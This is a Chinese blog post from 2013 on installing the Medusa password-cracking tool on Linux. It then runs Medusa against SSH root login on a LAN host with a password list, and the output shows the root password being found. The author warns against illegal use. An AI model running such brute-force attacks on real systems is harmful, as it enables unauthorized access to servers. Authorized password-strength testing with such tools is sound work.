Carey【胭脂扣】

Linux 下的另一个密码破解工具medusa

首先,本人在此声明 此工具许合理利用非法破解很可能会被发现的因为这是一个暴力破解方式需要不断的尝试登陆服务器 ,服务器上的检测软件很快可以跟踪到并锁定你的IP地址

请大家切勿用于非法手段- -!

medusa 很多dota玩家应该知道- -!不过此非dota内的 远比其厉害的多- -!

好了直接上安装步骤

首先用浏览器查看了下最新的包是2012年发的 medusa-2.1.1.tar.gz

 1 root@localhost ~]# wget http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz
 2 --2013-06-19 00:46:26--  http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz
 3 正在解析主机 www.foofus.net... 64.73.32.134
 4 正在连接 www.foofus.net|64.73.32.134|:80... 已连接。
 5 已发出 HTTP 请求,正在等待回应... 301 Moved Permanently
 6 位置:http://www.foofus.net/~jmk/tools/medusa-2.1.1.tar.gz [跟随至新的 URL]
 7 --2013-06-19 00:46:28--  http://www.foofus.net/~jmk/tools/medusa-2.1.1.tar.gz
 8 再次使用存在的到 www.foofus.net:80 的连接。
 9 已发出 HTTP 请求,正在等待回应... 200 OK
10 长度:383424 (374K) [application/x-gzip]
11 正在保存至: “medusa-2.1.1.tar.gz”
12 
13 100%[====================================================>] 383,424      156K/s   in 2.4s    
14 
15 2013-06-19 00:46:30 (156 KB/s) - 已保存 “medusa-2.1.1.tar.gz” [383424/383424])

这里我做的时候提示找不到ssh的执行所有查看了下cat /etc/ld.so.conf.d/*下 所有方法大家跟我一样的可以在此假如一下步骤

 1 [root@localhost medusa-2.1.1]# cat /etc/ld.so.conf
 2 include ld.so.conf.d/*.conf
 3 [root@localhost medusa-2.1.1]# echo  /usr/local/lib > /etc/ld.so.conf.d/local.conf
 4 [root@localhost medusa-2.1.1]# cat /etc/ld.so.conf.d/
 5 cat: /etc/ld.so.conf.d/: 是一个目录
 6 [root@localhost medusa-2.1.1]# cat /etc/ld.so.conf.d/*
 7 # This directive teaches ldconfig to search in nosegneg subdirectories
 8 # and cache the DSOs there with extra bit 1 set in their hwcap match
 9 # fields.  In Xen guest kernels, the vDSO tells the dynamic linker to
10 # search in nosegneg subdirectories and to match this extra hwcap bit
11 # in the ld.so.cache file.
12 hwcap 1 nosegneg
13 /usr/local/lib
14 /usr/lib/mysql
15 /usr/lib/qt-3.3/lib
16 /usr/lib/xulrunner-2
17 [root@localhost medusa-2.1.1]# ldconfig

OK这样在执行 编译三部曲 ./configure && make && make install

如无报错 那么基本安装成功!

查看下medusa都支持什么 可运行命令:#medusa -d

然后来验证下破解哈哈还是接着上次的本人绝版密码库文件- -! 运行如下:

 1 [root@localhost ~]# medusa -h 192.168.1.253 -u root -P passwrod.txt -M ssh
 2 Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
 3 
 4 ACCOUNT CHECK: [ssh] Host: 192.168.1.253 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: adsadsa (1 of 7 complete)
 5 ACCOUNT CHECK: [ssh] Host: 192.168.1.253 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: sadsaqhjk (2 of 7 complete)
 6 ACCOUNT CHECK: [ssh] Host: 192.168.1.253 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 132321hj (3 of 7 complete)
 7 ACCOUNT CHECK: [ssh] Host: 192.168.1.253 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: dsads13213 (4 of 7 complete)
 8 ACCOUNT CHECK: [ssh] Host: 192.168.1.253 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: DELL2012. (5 of 7 complete)
 9 ACCOUNT FOUND: [ssh] Host: 192.168.1.253 User: root Password: DELL2012. [SUCCESS]
10 更多使用可以medusa --help or man medusa查看- -!
11 [root@localhost ~]# man medusa

 

posted @ 2013-06-18 17:09  胭脂筘  阅读(1398)  评论(0)    收藏  举报